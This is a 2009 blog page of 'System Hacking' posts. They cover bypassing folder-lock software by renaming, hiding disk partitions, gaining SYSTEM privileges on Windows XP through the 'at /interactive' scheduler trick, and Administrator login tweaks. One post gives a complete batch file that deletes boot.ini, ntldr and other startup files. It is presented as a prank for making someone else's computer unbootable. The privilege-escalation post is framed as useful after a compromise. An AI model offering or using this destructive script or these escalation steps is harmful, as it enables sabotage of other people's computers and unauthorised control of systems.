Many of the Folder locks today are having no encryption tecnique.....
They just change the extension of the particular folder which is to be hideded by the software....
This technique is applicable only for the folders which are seen locked by a locking picture on the specified folder...
firstly you should be aware of some general dos commands..
Dir :: Displays a list of a directory's files and subdirectories. Used without parameters, dir displays the disk's volume label and serial number, followed by a list of directories and files on the disk, including their names and the date and time each was last modified. For files, dir displays the name extension and the size in bytes. Dir also displays the total number of files and directories listed, their cumulative size, and the free space (in bytes) remaining on the disk.
Syntax
dir [Drive:][Path][FileName] [...] [/p] [/q] [/w] [/d] [/a[[:]attributes]][/o[[:]SortOrder]] [/t[[:]TimeField]] [/s] [/b] [/l] [/n] [/x] [/c] [/4]
Parameters
[Drive:][Path]
Specifies the drive and directory for which you want to see a listing.
[FileName]
Specifies a particular file or group of files for which you want to see a listing.
/p
Displays one screen of the listing at a time. To see the next screen, press any key on the keyboard.
/q
Displays file ownership information.
/w
Displays the listing in wide format, with as many as five file names or directory names on each line.
/d
Same as /w but files are sorted by column.
/a [[:] attributes]
Displays only the names of those directories and files with the attributes you specify. If you omit /a, dir displays the names of all files except hidden and system files. If you use /a without specifying attributes, dir displays the names of all files, including hidden and system files. The following list describes each of the values you can use for attributes. The colon (:) is optional. Use any combination of these values, and do not separate the values with spaces. Value Description
h Hidden files
s System files
d Directories
a Files ready for archiving
r Read-only files
-h Files that are not hidden
-s Files other than system files
-d Files only (not directories)
-a Files that have not changed since the last backup
-r Files that are not read-only
This much is sufficient....
next command used is RENAME
Rename (ren)Changes the name of a file or a set of files.
Syntax
rename [Drive:][Path] filename1 filename2
ren [Drive:][Path] filename1 filename2
Parameters
[Drive:][Path] filename1
Specifies the location and name of the file or set of files you want to rename.
filename2
Specifies the new name for the file. If you use wildcards (* and ?), filename2 specifies the new names for the files. You cannot specify a new drive or path when renaming files.
/?
Displays help at the command prompt.
Now we would be using these two commands to crack the lock...
Step 1) open cmd and go to the source path..
eg: your folder which is locked is in d:/VIdeos>
then reach there and follow next step
Step 2) Write Dir /a in cmd and press enter
you will see the list of directories including your hidden as well as your locked directory with some particular extension...
step 3) Rename the locked folder by using its full name with extension..
eg: rename secret.{1240ac34d15-0001-922d-3ec0} secret
and you have done it...your lock has been removed....
you can fool your friends also by this trick ..
just unlock the locked folder and Rename the particular folder you want to lock with same extension..
eg: rename secret secret.{1240ac34d15-0001-922d-3ec0}
if you like the trick just say thanks.........
I Also have a technique to recover hidden files from expired Instant lock..
for details mail me.......
Sunday, April 5, 2009
Cracking Folder Lock.........
Posted by Catch_Robin at 1:27 AM 1 comments
Labels: System Hacking
Wednesday, March 25, 2009
How to shut down a computer FOREVER!
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
note replace c: with the drive letter in which windows is installed if not in c drive
Open up notepad and copy and paste that. Save it as a .bat file.
This should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart. Have fun >:-D
REMEMBER - DO NOT CLICK THIS FILE. (for the idiots)
YOU WONT RECOVER YOUR COMPUTER BACK AFTER YOU OPEN THE .BAT FILE!
Posted by nikychetan at 10:48 AM 0 comments
Labels: System Hacking, Tricks, Virus Lab
Wednesday, March 18, 2009
Easier Way To Hide Window Partion.....
just perform these simple steps........
1)Right click on My Computer
here we se a Manage option
just click on that..
2) now go to Disk Management.click on it.
3) you will see disk partion ...now click on the partion you want to hide leaving the bootable drive..
4)Right click on it and you will see a option Change DriveLetter and Path... click on it..
5) now remove the letter of the drive.. and a warnig appears set it to ok and you are done your drive is now hidden.....
6) to unhide same steps but intead of removing the letter add the letter of you choice...
Thanks..........
Posted by Catch_Robin at 6:39 AM 1 comments
Labels: System Hacking
Thursday, March 12, 2009
Hide whole partition of HDD !!!
1. Go to Start > run > type "diskpart".A DOS window will appear with following discription.DISKPART>
2. Then type "list volume"The result will look like : ------
Volume ### Ltr Label Fs Type Size Status Info
--------------- --- -------- ---- ------ ---- ------ ----
Volume 0 F CD-ROM
Volume 1 C Window_XP NTFS Partition 7000MB Healthy
System
Volume 2 D Softwares NTFS Partition 8000MB Healthy
Volume 3 E Songs NTFS Partition 8000MB Healthy
3. Suppose u wanna hide drive E then type "select volume 3"Then a message will appear in same winwods { Volume 3 is the selected volume}
4. Now type "remove letter E"Now a message will come { Diskpart Removed the Drive letter }sometime it requires the reboot the computer .
Diskpart will remove the letter .Windows XP is not having capabilty to identify the unkown volume.
Your Data is safe now from all unauthorised users. To access the content of hidden Drive repeat the process mentioned above. But in 4th step replace " remove" to "assign"i mean type "assign letter E"
Posted by nikychetan at 7:11 AM 0 comments
Labels: System Hacking, Tricks, XP Tips Tricks
Tuesday, February 10, 2009
Computer Hacking.......
really that is possible !
u know why is it a "user" account because it lacks come service layer than that in "administrator" account
Using simple command line tools on a machine running Windows XP we will obtain system level privileges, and run the entire explorer process (Desktop), and all processes that run from it have system privileges. The system run level is higher than administrator, and has full control of the operating system and it’s kernel. On many machines this can be exploited even with the guest account. At the time I’m publishing this, I have been unable to find any other mention of people running an entire desktop as system, although I have seen some articles regarding the SYSTEM command prompt.
Local privilege escalation is useful on any system that a hacker may compromise; the system account allows for several other things that aren’t normally possible (like resetting the administrator password).
The Local System account is used by the Windows OS to control various aspects of the system (kernel, services, etc); the account shows up as SYSTEM in the Task Manager
Local System differs from an Administrator account in that it has full control of the operating system, similar to root on a *nix machine. Most System processes are required by the operating system, and cannot be closed, even by an Administrator account; attempting to close them will result in a error message. The following quote from Wikipedia explains this in a easy to understand way:
You can trick the system into running a program, script, or batch file with system level privileges.
One sample
One trick is to use a vulnerability in Windows long filename support.
Try placing an executable named Program.*, in the root directory of the "Windows" drive. Then reboot. The system may run the Program.*, with system level privileges. So long as one of the applications in the "Program Files" directory is a startup app. The call to "Program Files", will be intercepted by Program.*.
Microsoft eventually caught on to that trick. Now days, more and more, of the startup applications are being coded to use limited privileges.
Quote:
In Windows NT and later systems derived from it (Windows 2000, Windows XP, Windows Server 2003 and Windows Vista), there may or may not be a superuser. By default, there is a superuser named Administrator, although it is not an exact analogue of the Unix root superuser account. Administrator does not have all the privileges of root because some superuser privileges are assigned to the Local System account in Windows NT.
Under normal circumstances, a user cannot run code as System, only the operating system itself has this ability, but by using the command line, we will trick Windows into running our desktop as System, along with all applications that are started from within.
Getting SYSTEM
I will now walk you through the process of obtaining SYSTEM privileges.
To start, lets open up a command prompt (Start > Run > cmd > [ENTER]).
At the prompt, enter the following command, then press [ENTER]:
Code:
at
If it responds with an “access denied” error, then we are out of luck, and you’ll have to try another method of privilege escalation; if it responds with “There are no entries in the list” (or sometimes with multiple entries already in the list) then we are good. Access to the at command varies, on some installations of Windows, even the Guest account can access it, on others it’s limited to Administrator accounts. If you can use the at command, enter the following commands, then press [ENTER]:
Code:
at 15:25 /interactive “cmd.exe”
Lets break down the preceding code. The “at” told the machine to run the at command, everything after that are the operators for the command, the important thing here, is to change the time (24 hour format) to one minute after the time currently set on your computers clock, for example: If your computer’s clock says it’s 4:30pm, convert this to 24 hour format (16:30) then use 16:31 as the time in the command. If you issue the at command again with no operators, then you should see something similar to this:
When the system clock reaches the time you set, then a new command prompt will magically run. The difference is that this one is running with system privileges (because it was started by the task scheduler service, which runs under the Local System account). It should look like this:
You’ll notice that the title bar has changed from cmd.exe to svchost.exe (which is short for Service Host). Now that we have our system command prompt, you may close the old one. Run Task Manager by either pressing CTRL+ALT+DELETE or typing taskmgr at the command prompt. In task manager, go to the processes tab, and kill explorer.exe; your desktop and all open folders should disappear, but the system command prompt should still be there.
At the system command prompt, enter in the following:
Code:
explorer.exe
A desktop will come back up, but what this? It isn’t your desktop. Go to the start menu and look at the user name, it should say “SYSTEM”. Also open up task manager again, and you’ll notice that explorer.exe is now running as SYSTEM. The easiest way to get back into your own desktop, is to log out and then log back in. The following 2 screenshots show my results (click to zoom):
System user name on start menu
explorer.exe running under SYSTEM
What to do now
Now that we have SYSTEM access, everything that we run from our explorer process will have it too, browsers, games, etc. You also have the ability to reset the administrators password, and kill other processes owned by SYSTEM. You can do anything on the machine, the equivalent of root; You are now God of the Windows machine. I’ll leave the rest up to your imagination.
ADMINISTRATOR IN WELCOME SCREEN.
When you install Windows XP an Administrator Account is created (you are asked to supply an administrator password), but the "Welcome Screen" does not give you the option to log on as Administrator unless you boot up in Safe Mode.
First you must ensure that the Administrator Account is enabled:
1 open Control Panel
2 open Administrative Tools
3 open Local Security Policy
4 expand Local Policies
5 click on Security Options
6 ensure that Accounts: Administrator account status is enabled Then follow the instructions from the "Win2000 Logon Screen Tweak" ie.
1 open Control Panel
2 open User Accounts
3 click Change the way users log on or log off
4 untick Use the Welcome Screen
5 click Apply Options
You will now be able to log on to Windows XP as Administrator in Normal Mode.
EASY WAY TO ADD THE ADMINISTRATOR USER TO THE WELCOME SCREEN.!!
Start the Registry Editor Go to:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon \ SpecialAccounts \ UserList \
Right-click an empty space in the right pane and select New > DWORD Value Name the new value Administrator. Double-click this new value, and enter 1 as it's Value data. Close the registry editor and restart.
Posted by nikychetan at 11:40 PM 0 comments
Labels: System Hacking